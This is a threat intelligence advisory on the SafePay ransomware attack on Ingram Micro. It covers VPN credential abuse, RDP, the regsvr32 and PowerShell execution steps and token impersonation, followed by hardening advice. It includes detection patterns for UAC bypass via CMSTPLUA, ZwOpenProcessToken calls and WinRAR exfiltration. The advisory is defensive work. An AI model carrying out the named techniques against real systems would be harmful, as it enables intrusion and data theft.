SafePay Ransomware Cripples Ingram Micro

On July 3, 2025, IT distribution giant Ingram Micro suffered a ransomware attack carried out by the SafePay operation. The incident caused a significant outage of Ingram Micro’s internal systems, affecting global operations including ordering platforms and distribution services. The attackers left behind ransom notes on systems, but it’s unclear if data was encrypted or exfiltrated.

Severity Level: High

Incident Overview

• The attack was confirmed on July 6 by Ingram Micro, who admitted to detecting ransomware on “certain internal systems” and responded by isolating affected environments and launching an investigation with cybersecurity experts.
• Systems affected: Ordering systems, AI-powered Xvantage distribution platform, Impulse licensing platform.
• Data stolen during the breach: Ransom notes claimed wide data theft, but likely generic boilerplate language. No confirmation of specific exfiltrated datasets by Ingram Micro.

How The Breach Happened

• Entry Vector: Believed to be Palo Alto Networks GlobalProtect VPN
• Attack Method:
  • Use of compromised credentials (possibly from prior breaches or spray attacks)
  • Initial access followed by RDP logins
  • Potential abuse of VPN misconfigurations
  • Execution of payload via regsvr32.exe, PowerShell, and token impersonation

Root Cause

• Exploited VPN access via stolen or weak credentials.
• Insecure VPN Exposure: Lack of multi-factor authentication (MFA). Possible misconfigurations in GlobalProtect portal.
• Detection Gaps: Ransomware payloads had already reached employee endpoints by the time ransom notes were noticed.

Lessons Learned

• Single-factor VPN access remains a critical weak point – threat actors continue to exploit this as a low-friction entry vector using stolen or brute-forced credentials.
• Privileged accounts can become immediate force multipliers for attackers – once compromised, they enable rapid lateral movement & deployment of ransomware payloads without raising alarms.
• Threat actors are minimizing persistence footprints, opting to use legitimate credentials and built-in tools to avoid detection and bypass traditional security monitoring.
• Lack of early detection capabilities delayed containment, as initial access and lateral activity occurred before the ransomware trigger, leaving defenders reactive rather than proactive.

Ransomware Profile – Safepay

• Active Since: November 2024
• Known Victims: Over 220 across various sectors
• Target regions: Germany, United States, United Kingdom, Canada, Peru, Australia, Colombia, Romania, Singapore, Spain, and others.
• Target sectors: Manufacturing, Business Services, Education, Healthcare, Technology
• Status: One of the most active ransomware groups in 2025.
• Notable behavior: Often leaves ransom notes claiming data theft, though not always substantiated.

Recommendations

1. Mandate Multi-Factor Authentication (MFA) for all VPN, RDP, and privileged accounts.
2. Restrict RDP exposure through firewall rules or network segmentation; monitor for unexpected RDP activity.
3. Enforce strong password policies and apply rate-limiting to prevent brute-force or spray attacks.
4. Harden VPN infrastructure (e.g., Palo Alto GlobalProtect) by patching regularly and reviewing configurations for exposed services.
5. Disable or restrict use of LOLBins (e.g., regsvr32.exe, systemsettingsadminflows.exe) where not necessary.
6. Configure Windows Defender and AV policies via GPO to prevent GUI-based disabling.
7. Prevent UAC bypasses by monitoring for DLLHost.exe invoking CMSTPLUA COM objects (commonly abused by ransomware).
8. Deny SeDebugPrivilege where possible; monitor API calls like ZwOpenProcessToken.
9. Monitor for suspicious WinRAR usage and outbound data transfers (exfiltration pattern).
10. Block the IOCs at their respective controls
    https://www.virustotal.com/gui/collection/e9a56c9ef0ea3a757fc2b02194c92a306f103fae59d897640d3bbc74cc54c720/iocs

Source:

• https://www.bleepingcomputer.com/news/security/ingram-micro-outage-caused-by-safepay-ransomware-attack/
• https://www.businesswire.com/news/home/20250705035732/en/Ingram-Micro-Issues-Statement-Regarding-Cybersecurity-Incident
• https://medium.com/@DCSO_CyTec/safepay-the-new-kid-on-the-block-4141188a626d
• https://www.huntress.com/blog/its-not-safe-to-pay-safepay
• https://github.com/crocodyli/ThreatActors-TTPs/blob/main/SafePay/Safepay-TTP.md
• https://www.nccgroup.com/us/research-blog/weak-passwords-led-to-safepay-ransomware-yet-again/

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.